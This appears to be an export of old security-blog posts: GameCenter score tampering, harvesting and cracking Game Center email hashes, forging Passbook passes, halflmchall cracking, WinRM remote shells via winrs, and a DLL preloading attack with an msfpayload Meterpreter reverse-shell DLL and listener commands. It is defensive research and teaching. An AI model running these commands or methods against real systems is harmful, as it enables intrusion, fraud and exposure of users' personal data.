    1. These will be spendy (~$3,500+ for the combo, cards not included) but they are meant for this kind of setup.
  2. Look at what the bitcoin miners are doing.
    1. Our “open-air” setup is actually pretty similar to most mining rigs that I can find.
    2. Replicate their parts list for your setup, if it works for them, it “should” work for you.
  3. Plan everything out as best you can.
    1. From components and case layout to power and cooling requirements.
    2. Measure twice and cut once to avoid returns, repairs, and rebuying parts.
  4. Devote a resource to the project
    1. Intern not busy enough? Have them build the cracking machine.
    2. Find the person that plays more PC games than you.
      1. They may know more about the cards and multi-GPU setups.
  5. Don’t get discouraged if your set up isn’t working.
    1. We didn’t get it right on the first try, but we eventually got there.
Check out GPU Cracking: Setting up the Server by Eric Gruber on how to configure your cracking box to see all of the cards and run the cracking software. [post_title] => GPU Cracking: Building the Box [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gpu-cracking-building-the-box [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:44 [post_modified_gmt] => 2021-04-13 00:05:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1166 [menu_order] => 756 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [68] => WP_Post Object ( [ID] => 1170 [post_author] => 10 [post_date] => 2013-03-18 07:00:09 [post_date_gmt] => 2013-03-18 07:00:09 [post_content] => I recently wrote a blog post about cracking email hashes from the iOS GameCenter application. During my research on the issue, I noticed that there were a number of games where users had insanely high scores. Lots of the users also had the exact same score (9,223,372,036,844,775,807) for each of the games that they played. Coincidentally this number is the largest possible signed integer value that you can have. It turns out that getting these high scores isn't that hard to do.

Setup

In order to modify our scores, we will need to proxy our iOS traffic through Burp. In order to properly intercept the encrypted iOS traffic, you will also need to install the Portswigger certificate on your iOS device At this point, you will want your Burp listener to be on the same wireless network as your iOS device. You also need to have your Burp listener set to listen on all interfaces to allow your iOS device to proxy through it. The iOS proxy settings are fairly easy to set up. Just enter your Wi-Fi settings, tap on the blue and white arrow-in-a-circle (to the right of your SSID), and scroll down to your HTTP Proxy settings. Set the server IP to your Burp listener and set your port to the Burp listener port. Visit an https website on your iOS device to see if the Portswigger certificate is properly installed. If you don’t have any issues (or SSL warnings), you should be ready to go.

Modifying Scores

Once your iOS device is properly proxying traffic through your Burp listener, you will want to generate a score to post to GameCenter. For most games, this is not very hard to do. We will be using “Cut the Rope”as our example. Open up the first level, set Burp to intercept traffic, and complete the level (you cut one rope, it’s really easy). At this point you will see the “Level Complete” screen on your iOS device and the following request will come through Burp.
POST /WebObjects/GKGameStatsService.woa/wa/submitScores HTTP/1.1
Host: service.gc.apple.com
User-Agent: gamed/4.10.17.1.6.13.5.2.1 (iPhone4,1; 6.1.2; 10B146; GameKit-781.18)
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Accept: */*
Some-Cookies: have been removed to make this shorter
Content-Type: application/x-apple-plist
Connection: keep-alive
Proxy-Connection: keep-alive
x-gk-bundle-version: 2.1
Content-Length: 473
x-gk-bundle-id: com.chillingo.cuttherope
 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "https://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>scores</key>
    <array>
        <dict>
            <key>category</key>
            <string>1432673794</string>
            <key>context</key>
            <integer>0</integer>
            <key>score-value</key>
            <integer>12345</integer>
            <key>timestamp</key>
            <integer>1361998342937</integer>
        </dict>
    </array>
</dict>
</plist>
If you are seeing other requests come through, just forward them and keep your eye out for the request for the “submitScores” page. Before forwarding the score on to Apple, you will want to modify the score. The highest possible value that you can submit is 9,223,372,036,844,775,807. Replace the “score-value” stored in the tags (bolded in the example) with 9223372036844775807 and forward the request. You should receive a “status 0” response from Apple and your score will be updated in GameCenter.
Gc

Conclusion

I don’t intend on modifying my high scores for each of my GameCenter games. I really don’t care that much about the scores, but some people do. Given Apple’s current model for GameCenter leaderboards, this may not be an easy fix. At a minimum, Apple may want to do some checking on these high scores to weed out any of the users that are maxing out their top scores. For now, I’m going to put the iPhone down and get some work done.
[post_title] => Hacking High Scores in iOS GameCenter [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => hacking-high-scores-in-ios-gamecenter [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:30 [post_modified_gmt] => 2021-06-08 21:51:30 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1170 [menu_order] => 759 [post_type] => post [post_mime_type] => [comment_count] => 16 [filter] => raw ) [69] => WP_Post Object ( [ID] => 1174 [post_author] => 10 [post_date] => 2013-02-11 07:00:09 [post_date_gmt] => 2013-02-11 07:00:09 [post_content] =>

Lately I've been looking at iOS. After looking into the Passbook application, I started poking around with the iOS Game Center application. The iOS Game Center allows iOS users to connect with friends, play games, and compare scores for their games. Think of it as Xbox Live for iOS.

Each Game Center user has an alias (or nickname, handle, etc.), a first and last name, and an email address tied to their account (also tied to your Apple ID). A user’s alias is publicly accessible by all Game Center users. The user’s first and last names are provided if they are shown in the “Friend Recommendations” feature or if they share a mutual friend with another user. If an email address is tied to an account, a SHA1 hash of the email address might also be accessible. Sometimes there’s more than one email address tied to an account, so multiple hashes will be returned when the account information is queried. Finally, each user has a playerID in the format of G:145811274 (my ID). This is the unique identifier used by Game Center to identify an account. I was only able to see this identifier while intercepting traffic.

For this attack, I proxied all of my traffic through the Burp Suite proxy. This allowed me to easily capture (and replay) all of the requests that Game Center was making to Apple servers. I did have to install the Portswigger CA certificate on my iPhone to intercept the SSL traffic. The prime targets for data enumeration were the “Friend Recommendations” and the friends of my friends list.

Since I wasn't really using Game Center, I had to add some friends. I started by gathering all of the playerIDs for everyone in my recommended friends. This list appeared to be populated by recommendations based off of the people that I follow on Twitter and my Facebook friends. I also pulled down the top 150 users from the leader boards to add to my list as well. I intercepted an add request with Burp, moved the request into the intruder function and used my list of playerIDs (~250 IDs total) to automate the friend request process. After adding several friends (~20) I requested that Game Center send me a list of all of the friends of my friends. I then added them to the list of people to friend request.  I should also note that requesting over 500 people as friends will probably result in your iPhone/iPad/etc. exploding in notifications of friend approvals.

I should note here that it would be very easy to set up a script to run once a day, to pull down a list of friends of friends and automatically friend request everyone that is one hop away from me. 

Gc

Leader board listings

Gc

Listing of Friend Recommendations and the "Friends of a Friend" list

Attack

If you haven’t figured it out yet, the inference attack that I will demonstrate has to do with guessing the email address from the SHA1 hash. Since we already have an alias or handle for the user, along with the person’s first and last name, it’s not a long stretch for us to try and guess the email address(es) tied to their iTunes account. After enumerating all of the information available for my recommended friends and next-hop friends (friends of my friends), I wrote a quick PowerShell script to read the data and generate potential email addresses.

Considering most people (that I know) use some variation of their name, or a handle for their email address it was pretty easy to generate variations to use for guessing. In order to test multiple email domains, I appended each variation with hundreds of popular email address domains. Below is a sample of the potential email user names that I tested:

  • kfosaaen@example.com 
  • k.fosaaen@example.com 
  • karlfosaaen@example.com 
  • karl.fosaaen@example.com 
  • karl.f@example.com
  • karlf@example.com 

After generating the potential emails, I then created SHA1 hashes of these email addresses and compared them to the hashes in the collected data. The script I used is really simple and may not have any practical use for you, but I put it out on GitHub: https://github.com/kfosaaen/EmailGenerator

After I wrote the PowerShell script, I realized that I could just use HashCat to do the generation (and some brute forcing) for me. I just used the generated emails as my dictionary and some custom rules to help with the address guessing.

Results

By the end of my data collection, I had attempted to add over five-hundred people as friends on Game Center. If you happened to be one of those people, I’m sorry. Overall, I was able to add 174 new friends to my Game Center account. Thanks to those friends, I was able to collect 1,635 records of Game Center ID, Alias, Email Hash, and Full Names. I actually stopped collecting records after I hit 45 friends, but I’m sure that I could get many more at this point. Those records also had to be paired down to remove special characters in user names, so the final list came out to 1,534 records. Of those, I was able to crack three hundred (19.5%) of the email addresses in about seven minutes.

This was all done over the course of about four days. Given more time and a better script for generating potential email addresses, I think that the percentage would be a lot higher for the collected email addresses. I did stop the attack at the point where I felt that I had a good proof-of-concept, as I really didn't care to harvest a ton of emails. I have been in contact with Apple about this since January 10th, so they've had a fair amount of time to deal with the issue on their end.

Conclusion

I know this isn't a ground breaking attack that exposes tons of sensitive user data, but it’s important to note that if a piece of data is important enough to hash, it should be hashed well. It should also not be available to all users. From an attacker’s perspective, having this information would be very valuable to anyone trying to attack a specific iTunes account. If you’re a Game Center user, you can protect your info by turning off the “Public Profile” feature in the Game Center settings.

In order to fix the issue, Apple should consider the business need for returning SHA1 hashes of user email addresses. I don’t know what the hashes are currently being used for on the iPhone side, but there may be a need for them. If they are needed, then Apple should be salting these hashes to reduce the risk of an attacker cracking them.

[post_title] => Know Your Opponent – an Inference Attack Against iOS Game Center [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => know-your-opponent-an-inference-attack-against-ios-game-center [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:27 [post_modified_gmt] => 2021-06-08 21:51:27 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1174 [menu_order] => 763 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [70] => WP_Post Object ( [ID] => 1180 [post_author] => 10 [post_date] => 2012-12-12 07:00:09 [post_date_gmt] => 2012-12-12 07:00:09 [post_content] => With the release of iOS 6, Apple introduced the Passbook application. Currently there are sixteen different applications that support Passbook integration. The purpose of the Passbook application is to provide a one-stop application to manage all of your coupons, loyalty/gift cards, and tickets/boarding passes. This all sounds great, but what happens when an attacker abuses this service to get discounts or to access other peoples’ gift cards. This blog will show you how easy it is to intercept Passbook passes, modify them, and redeploy them to the Passbook application. The Passbook passes are typically generated by applications at the user’s request. The user tells the application that they want their coupon/ticket/etc. in their Passbook and the application calls out to its Passbook server. At this point, the Passbook server generates the pass and sends it back to the app to pass on to the user.

How can we break it?

Now there are already multiple services available that will generate Passbook passes for you. I’m not going to cover those here, as they have their own ways of creating passes and that’s not what we’re looking to do. In this blog, you’ll see how you can intercept a Passbook .pkpass file from the source and modify it for your own uses.

How to intercept the pass

The easiest way to intercept the Passbook URLs and/or files is by using a proxy. I have Burp Proxy set up on a laptop to intercept web traffic from my iPhone. Once you identify the Passbook request URLs (assuming the application uses HTTP for requests), you can easily replay the request (in a browser) from the intercepting host to get the .pkpass file. Additionally, you could sniff out wireless traffic from your wireless network and identify Passbook requests.

Deconstructing the .pkpass

Plain and simple, .pkpass files are zip files. All you have to do to access the internal files is unzip the file. Once unzipped, the three required files contained in the .pkpass folder are:
  • manifest.json (generated by Apple’s signpass tool)
  • pass.json (contains the Passbook pass data)
  • signature (a signature file for integrity
Additional image files may be in the folder to be used by the pass (icon.png, thumbnail.png, strip.png), but those are all considered optional. If you are looking at an intercepted pass file, you will most likely find additional images used for the pass. The most interesting file is the pass.json file. A sample of the pass.json:
{ "passTypeIdentifier":"pass.com.ACME. MobileCoupon", "formatVersion":1, "organizationName":"ACME Corporation", "serialNumber":"ABCDX-12345", "teamIdentifier":"A9BKD012", "logoText": "", "description":"ACME coupons.", "webServiceURL":"https://PASSBOOKServer.com/passbook/", "authenticationToken":"123456789123456789123456789", "suppressStripShine" : 1, ], "locations":[ {"latitude" : 44.989893, "longitude" : -93.279087} ]
Here are the important parts that you need to modify, if you’re going to regenerate your own pass.
  • passTypeIdentifier -This will later be changed to your Identifier (see below)
  • teamIdentifier - This will also get changed to yours (also see below)
  • webServiceURL - You may just want to remove this one (otherwise the pass may phone home for updates)
  • authenticationToken - You may also want to delete this as well (it’s not going to get used by anything)

How to create your own passes with signpass

At this point, I’m going to assume that you’re using a Mac to generate your passes. You can do this from Windows, but it’s a little more complicated (and a possible future blog post). Get yourself an iOS developer account with Apple. It’s $99 and you actually get some interesting stuff with it (assuming you’re into iOS). Once you have an account, you need to create a “New Pass Type ID” from the iOS Provisioning Portal. This pass type ID will be used by the pass.json file as the passTypeIdentifier and the teamIdentifier. You can follow the steps on Apple’s site to create the ID. Open the “configure” action on the Pass Type ID page and download the pass certificate. Once you download your certificate, install it to your OSX keychain and you should be good to sign your own passes. Passbook The Apple developers site has the Passbook SDK available that contains the signpass application for generating .pkpass files. The SDK actually provides several example passes that you can generate on your own for testing. In order to generate the actual .pkpass files, you will need to compile the signpass application in Xcode (the project is in the SDK files). This can be a pain if you’re not familiar with Xcode. Basically, you build the application in Xcode, click on “Products” (on the left), right click on signpass, and click “Show in Finder.” This will bring you to the compiled application, where you can copy it out to your Passbook directory. Once you’ve compiled the signpass application, you can use it to generate the manifest.json and signature files. The application will also zip all the files into the .pkpass file. You can use your intercepted file that you unzipped earlier, but you will want to delete the signature and manifest.json files before you try and recreate the .pkpass file. You will also want to modify the pass.json parameters (passTypeIdentifier and teamIdentifier) to match the certificate you just downloaded from Apple. Finally, since you’re working on a Mac, you need to delete any .DS_Store files that get created in your .pkpass folder. If there is a .DS_Store file in the folder and it isn’t caught by the manifest.json file, your pass will not be valid on the phone. Here’s an example of the .pkpass creation:
{ NetSPIs-MacBook-Pro:netspi NetSPI$ ./signpass -p NetSPI.raw/  2012-11-12 15:00:04.512 signpass[945:707] {  "icon.png" = 575b58cc687b853935c63e800a63547a9c54572f;  "icon@2x.png" = dbfca47b69c6f0c7fc452b327615bc98d7732d33;  "logo.png" = d360269292d8cfe37f5566bba6fb643d012bef84;  "logo@2x.png" = cdd3c98dd3044fe3d82bcea0cca944242cdcc6bf;  "pass.json" = f72d3d597c7fc9d1f2132364609d32c9890de458;  "strip.png" = b9f823da6eefc83127b68f0ccca552514803ed1f;  "strip@2x.png" = 319991c69de365c0d2a8534e0997aea01f08d3eb;  "thumbnail.png" = a68cc65e48febb6e603682d057d4e997da64a6a5;  "thumbnail@2x.png" = 7ec0e3c38225fea3a5b0dbb36d7712c27b8b418f; }

Sending passes via email or web

The easiest way to deploy your newly created pass is through email. A properly signed .pkpass file should show up in your iOS mailbox as a Passbook pass without any issue. Additionally, .pkpass files can be downloaded from a web server that has support for serving .pkpass files.

Passbook

Conclusions

The primary risk that I see with intercepting Passbook files is fraud. Someone could potentially modify a pass to try and get a discount at a store, or maybe gain access to someone else’s rewards account. This can easily be stopped by using strong controls on the business’s side, but there’s always a risk of social engineering. For those developing Passbook integration for their applications, make sure all of your pass files are sent over securely encrypted channels and ensure that your business has strong controls to prevent tampering with Passbook passes. For those that would like a copy of the NetSPI pass shown above, email me karl.fosaaen@netspi.com. [post_title] => Hacking Passbook, the Real Way to do Extreme Couponing [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => hacking-passbook-the-real-way-to-do-extreme-couponing [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:24 [post_modified_gmt] => 2021-06-08 21:51:24 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1180 [menu_order] => 772 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [71] => WP_Post Object ( [ID] => 1184 [post_author] => 10 [post_date] => 2012-11-09 07:00:09 [post_date_gmt] => 2012-11-09 07:00:09 [post_content] => Frequently during penetration tests, we will capture halflmchall password hashes from the network. These can come from a variety of sources, but common sources include NBNS spoofing and SQL queries/SQL injection. Both methods can be easy ways to get halflmchall hashes during a pen test. For those who are unfamiliar with halflmchall hashes and how they are created, the process is pretty simple. When a client makes an authentication request with a server, the server responds with a challenge (which is basically a seed value used for hashing) for the client to use. If we are acting as the server, we can specify the challenge and the authentication protocol that we want to use. If we have a static challenge (1122334455667788) and a weak authentication protocol (LANMAN v1), we’re able to quickly look up the captured hashes in rainbow tables. Now, this isn’t the full technical detail of the process, but hopefully this gives you a good idea as to how this can work to our advantage. For a much more in-depth review of the process, here’s a great write up  - https://www.foofus.net/?page_id=63 The typical capture to cracked password process goes like this:
  1. Obtain a man-in-the-middle position, or force a server to authenticate to your evil server.
  2. Capture the hash (via SMB or HTTP servers).
  3. Look up the first 16 characters of the captured LM hash in the HalfLMChall rainbow tables.
  4. Use the cracked portion of the LM hash to feed into the John the Ripper netntlm.pl script to crack the rest of the LM hash.
  5. Feed the case insensitive password (from step 3) back into the netntlm.pl script to crack the case sensitive NTLM hash and get the full password.
The cracking process goes pretty quickly, but it does require multiple commands to  run that includes some copy and paste work. I’ve found that this process takes up more of my time than I would like, so I wrote a PowerShell script to automate the whole cracking process.

PowerShell cracking script requirements:

  1. The halflmchall rainbow tables
  2. Rcracki_mt
  3. John the Ripper (Jumbo release)
  4. Perl (required to run netntlm.pl)
  5. You will also need to enable PowerShell to run scripts: “Set-ExecutionPolicy RemoteSigned”
Within the script you will have to specify your John, rcrack, Perl, and rainbow table locations, but you should be able to run the script from any directory. The script usage is simple:
PS_MultiCrack.ps1 Input_File Output_File
You should be able to use the john formatted output file generated from the metasploit modules, but below is the basic format that the script will require:
DomainUser:::LMHASH:NTLMHASH:1122334455667788
ExampleTestAdmin:::daf4ce8f1965961138e76ee328e595e0c0c2d9a83fbe83fb:211af68207f7c88a1ad6c103a56966d1da1c1e91f02291f0:1122334455667788
The “1122334455667788” is the default static salt that is used by most of the tools used for capturing the hashes. It’s also the salt used by the rainbow tables (Download here). The script will write out each username and password to the output file when it’s done. Hashes that are already in the john.pot file will be prefixed in your output file as “Previously Cracked:” so that you don’t have to worry about cleaning out your input file as you add more hashes. Additionally, the script won’t go through the effort of cracking the same hash again, as that would be a waste of time. If you have any comments, suggestions, issues, please let me know through here or GitHub and I’ll try to address them. GitHub Repo [post_title] => Automating HalfLMChall Hash Cracking [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => automating-halflmchall-hash-cracking [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:35 [post_modified_gmt] => 2021-04-13 00:05:35 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1184 [menu_order] => 775 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [72] => WP_Post Object ( [ID] => 1186 [post_author] => 10 [post_date] => 2012-10-29 07:00:09 [post_date_gmt] => 2012-10-29 07:00:09 [post_content] =>

Introduction - What is WinRM?

Windows Remote Management (WinRM) is a SOAP based protocol that can be used to remotely administer machines over the network. This is a handy tool for network admins that can also be used to automate tasks securely across multiple machines. However, it is fairly easy to misconfigure the service and/or abuse the service with legitimate account access.

How to mess up the WinRM configuration

In my personal experience with configuring the WinRM service, I have found it hard to get anything working correctly without completely removing security controls from the configuration. Scale my frustrations up to a domain level and you very quickly have poorly secured configs going out to hosts across a domain. It should be noted that the following commands should not be used for an actual WinRM configuration. These are just examples of the multiple ways that this service can be configured to run insecurely . Quick steps for configuring WinRM insecurely: Note: These are all commands that are run from a command shell with administrative privileges.
  1. Start the WinRM service. The only requirement to start the service is that none of your network interfaces can be set to “Public” in Windows. This typically isn’t an issue in domain environments. The command itself is not really a security issue, it’s just needed to actually run the WinRM service.winrm quickconfig
  2. Allow WinRM commands to be accepted through unencrypted channels (HTTP).winrm set winrm/config/service @{AllowUnencrypted="true"}
  3. Allow WinRM command to be sent through unencrypted channels (HTTP).winrm set winrm/config/client @{AllowUnencrypted="true"}
  4. Enable “Basic” network authentication for inbound WinRM connections to the server.winrm set winrm/config/service/auth @{Basic="true"}
  5. Enable “Basic” network authentication for outbound WinRM client connections. So, when you make a WinRM connection to another host with the local WinRM client, you can authenticate using “Basic” authentication.winrm set winrm/config/client/auth @{Basic="true"}
  6. Allow credentials to be relayed out to another host using the CredSSP protocol. This allows the host receiving commands to pass incoming credentials on to another host for authentication.winrm set winrm/config/service/auth @{CredSSP=”True”}
In order to authenticate against the service remotely, the authenticating account either has to be the same as the service account running the WinRM service, or a member of the local administrators group. This also means that any service set up to run scripted jobs through WinRM has to have access to credentials for a local administrator account.

What can we do with this?

Let’s assume that you have access to a host on a network and you have domain credentials, but there are no escalation points for you to follow on the host. If the WinRM service is set up to listen on other hosts in the domain, you may have the ability to use the service to gain remote access to the other hosts. Let’s say that you want to gain remote access to host 192.168.0.123 on the domain, but RDP is not enabled (or your account does not have RDP access). The open ports 5985 and 5986 (TCP) indicate that the WinRM service may be running on the remote host. You can identify the service with the following command:

winrm identify -r:https://192.168.0.123:5985 –auth:none

The response should look something like this:

IdentifyResponse ProtocolVersion = https://schemas.dmtf.org/wbem/wsman/1/wsman.xsd ProductVendor = Microsoft Corporation ProductVersion = OS: 6.1.7601 SP: 1.0 Stack: 2.0

Once you’ve determined the service is running, you can try to run commands against the remote host with the Windows Remote Shell (winrs) command:

winrs -r:https://192.168.0.123:5985 -u:domainnameuseraccount "dir c:"

You can also use this with HTTPS on port 5986, as that may be your only option. If you change the “dir c:” to “cmd” you will have a remote shell on the host. That should look something like this:

winrs -r:https://192.168.0.123:5985 -u:domainnameuseraccount "cmd”

While the remote shell will only be running under your account’s privileges, there may be other escalation options on your new host.

Conclusion

As you can see, the WinRM service can be very powerful and useful for legitimately administering systems on the domain. It also can be used by attackers to work their way through the internal network. With any network service, determine your business need for the service before it is implemented. If the service is needed, then ensure that the service is securely configured before it is deployed. If you’re thinking about using WinRM, make sure that you only allow specific trusted hosts and limit users in your local administrators groups. [post_title] => Exploiting Trusted Hosts in WinRM [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => exploiting-trusted-hosts-in-winrm [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:18 [post_modified_gmt] => 2021-04-13 00:05:18 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1186 [menu_order] => 777 [post_type] => post [post_mime_type] => [comment_count] => 5 [filter] => raw ) [73] => WP_Post Object ( [ID] => 1187 [post_author] => 10 [post_date] => 2012-10-22 07:00:09 [post_date_gmt] => 2012-10-22 07:00:09 [post_content] => DLL preloading (also known as sideloading and/or hijacking) is a common vulnerability in applications. The exploitation of the vulnerability is a simple file write (or overwrite) and then you have an executable running under the context of the application. The vulnerability is fairly easy to identify and even easier to exploit. In this blog, I will be showing you how identify and exploit DLL preloading vulnerabilities, as well as give you tips on how you can protect yourself from these vulnerabilities.

What is it?

DLL preloading happens when an application looks to call a DLL for execution and an attacker provides a malicious DLL to use instead. If the application is not properly configured, the application will follow a specific search path to locate the DLL. The application initially looks at its current directory (the one where the executable is located) for the DLL. If the DLL is not found in this location, the application will then continue on to the current working directory. This can be very helpful if the malicious DLL can be loaded along with a file, as the file and DLL can be accessed by multiple people on a network share. From there it’s on to the system directory, followed by the Windows directory, finally looking in the PATH environmental variable for the DLL. Properly configured applications will require specific paths and/or proper signatures for DLLs in order to use them. If an attacker has write access to the DLL or a location earlier within the search path, they can potentially cause the application to preload their malicious DLL.

How to identify vulnerable DLLs

Personally, I like to use Dependency Walker for static analysis on all of the DLLs that are called by the application. Note that Dependency Walker will not catch DLLS that are compiled into the application. For a more dynamic approach, you can use ProcMon. ProcMon can be used to identify vulnerable applications by identifying DLLs called during runtime. Using ProcMon for the Net Stumbler program, we can see that the application makes multiple calls to the MFC71ENU.DLL file. Dll We identify vulnerable DLLs by the locations that they are called from. If the location is controlled by an attacker, the application is potentially vulnerable. Here we can see that NetStumbler (version 0.4.0) is looking for the mfc71enu.dll file in a number of different directories, including the tools directory from which I opened a .ns1 NetStumbler file. This is not a guarantee that the application is vulnerable. The application may use some secondary measures (integrity checks) to prevent DLL tampering, but this is at least a good start for trying to attack the application.

How to exploit it

Once a vulnerable DLL is identified, the attack is fairly simple.
  1. Craft your malicious DLL with Metasploit
    1. msfpayload PAYLOAD LHOST=192.168.0.101 LPORT=8443 D > malicious_DLL.dll
      1. PAYLOAD, LHOST, and LPORT are up to you
      2. D denotes that you are creating a DLL payload
    2. Place the replacement DLL in the vulnerable directory and rename it to the name of the vulnerable DLL.
    3. Set up your listener
      1. Run the Metasploit console
      2. msf > use exploit/multi/handler
      3. msf exploit(handler) > set LHOST 127.0.0.1
      4. msf exploit(handler) > set LPORT 8443
      5. msf exploit(handler) > exploit –j
        1. This will start the listener as a job, allowing you to handle multiple ses-sions.
    4. Run the application (or open your file with the DLL in the same folder). Once the applica-tion makes the call to the vulnerable DLL, the Meterpreter payload will execute. If this is done on a network share, this could have a much greater impact.
    5. The Metasploit sessions –l will list out the active sessions and sessions –i (SessionNumber) will let you interact with the session.
For this version of Net Stumbler (0.4.0), the application is vulnerable through the mfc71enu.dll file. Below is an example of a malicious DLL placed in the directory of a Net Stumbler file. When the TestStuble.ns1 file is opened, the application will use the malicious DLL located in the current directory and create a Meterpreter session. Dll

How to fix it or prevent it

DLL preloading can be a helpful attack during a penetration test, but it doesn’t have to be a pain to fix. For application developers:
  • Require set paths for DLLs in applications
For system administrators:
  • Disable write permissions to relative application folders
  • Utilize least privilege access to prevent users (and applications) from having too much access to the system
For both groups:

Conclusion

As you can see, DLL preloading is still a common issue with applications. Hopefully this blog can help give you some insight on how the attack works and what you can do to lock down your applications to prevent this issue. If you want some examples of vulnerable applications, ExploitDB has a great list. [post_title] => Testing Applications for DLL Preloading Vulnerabilities [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => testing-applications-for-dll-preloading-vulnerabilities [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:23 [post_modified_gmt] => 2021-06-08 21:51:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1187 [menu_order] => 778 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [74] => WP_Post Object ( [ID] => 1190 [post_author] => 10 [post_date] => 2012-10-09 07:00:09 [post_date_gmt] => 2012-10-09 07:00:09 [post_content] => Recently Adam Caudill and ElcomSoft identified vulnerabilities in the way that UPEK fingerprint readers store Windows passwords in the registry. Adam has released a great proof-of-concept tool to decrypt these poorly encrypted passwords. I have access to a Lenovo T420 ThinkPad that features a UPEK fingerprint reader. The ThinkVantage Fingerprint Software is also vulnerable to this UPEK issue. The issue with the ThinkPad software affects credentials that are entered by the user in the ThinkVantage Fingerprint Software. Since I do not use the fingerprint reader for Active Directory authentication, I do not regularly update my password in the software. So when I initially ran the decryption tool, the tool came back with my password from several months ago. For users who regularily use the fingerprint reader for AD authentication, this could be a major issue. If you have this software on your machine and want to keep it on your machine, I would recommend the following:
  1. Set a disposable password for your Windows account
  2. Open up the “ThinkVantage Fingerprint Software” (Accessible from the ThinkVantage Client Security Solution menu)
  3. Enter your disposable password in the software and click “Submit”:Lenovo
  4. Close out the software and only authenticate to the application with your fingerprint.
  5. Once your password has been updated, it may be worth compiling Adam Caudill’s tool to double check that the password has been changed: https://github.com/brandonlw/upek-ps-pass-decryptLenovo
  6. Additionally, you can use the reveal password button to show the current password stored by the application.
  7. Finally, full disk encryption is a good idea, regardless of your use of a fingerprint reader. If someone steals your computer, full disk encryption will prevent them from recovering data (including registry keys) from the hard drive.
[post_title] => UPEK + Lenovo = Insecure Password Storage [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => upek-lenovo-insecure-password-storage [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:20 [post_modified_gmt] => 2021-06-08 21:51:20 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1190 [menu_order] => 781 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [75] => WP_Post Object ( [ID] => 1207 [post_author] => 10 [post_date] => 2012-05-24 07:00:09 [post_date_gmt] => 2012-05-24 07:00:09 [post_content] => In November of 2010, Facebook introduced their “@facebook.com” messaging option that gave users the opportunity to create their own facebook.com email address. Currently, all Facebook users have the ability to claim their own facebook.com email address. It’s easily accessible from the “messages” page, if your account has not already been set up for it. While the service is a nice way of communicating with non-Facebook friends via email and the Facebook message dashboard, there are some security issues that open up along with the service. Facebook accepts incoming email messages for delivery from their MX Record - smtpin.mx.facebook.com (66.220.155.14). These messages are currently being accepted for delivery based on their source IP address and whether or not the address is associated with a PTR record. This is supposed to prevent spoofing, but the mail server only checks the IP for a valid PTR record for that IP, and not if the domain of the sender’s email address matches the IP of the mail server. To fix this, Facebook needs to ensure that a message coming from a gmail.com address is originating from a Gmail mail server. Messages from non-PTR record IP addresses are stopped by the Facebook mail server. SMTP connection attempt from an IP without a PTR record:
$ telnet 66.220.155.14 25 Trying 66.220.155.14...
Connected to smtpin.mx.facebook.com (66.220.155.14).
Escape character is '^]'. 
554 5.1.8 DNS-P3 https://postmaster.facebook.com/response_codes? #dns-p No PTR Record
Connection closed by foreign host.
The Facebook mail server does however allow incoming messages from IPs with a PTR record, which allows us to spoof messages from other users. If you are behind an IP address with a PTR record, you can spoof a message from an external domain to a facebook.com email address. Currently, Facebook is properly blocking incoming messages spoofing a facebook.com domain. If Facebook gets breached, and their semi-private @facebook.com email addresses are leaked publicly, someone could easily start spoofing messages between users to propagate spam, phishing attacks, and/or malware. Right now, it’s not very hard to guess someone’s Facebook email address based off of their Facebook username, so Facebook needs to implement a filter that ensures the IP address from which a message originates matches the IP address of the MX record for the domain the message claims to come from. This will prove the sender of the message is on the same domain as the address they are claiming to represent. This does not outright remove the risk of spoofing between users, but it’s a good start. Currently Facebook does some notification on suspicious messages. This equates to a small yellow triangle in the right hand corner of the message. It’s not very obvious and could easily be interpreted as “important” or “urgent.” Facebook The above message was sent from my spoofed Gmail address to my @facebook.com address. It should be noted that Facebook is not the only site that falls victim to SMTP spoofing issues. Many of the social networking sites that allow users to accept emails as messages may be vulnerable to the same issues. [post_title] => Facebook message spoofing via SMTP [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => facebook-message-spoofing-via-smtp [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:51:18 [post_modified_gmt] => 2021-06-08 21:51:18 [post_content_filtered] => [post_parent] => 0 [guid] => 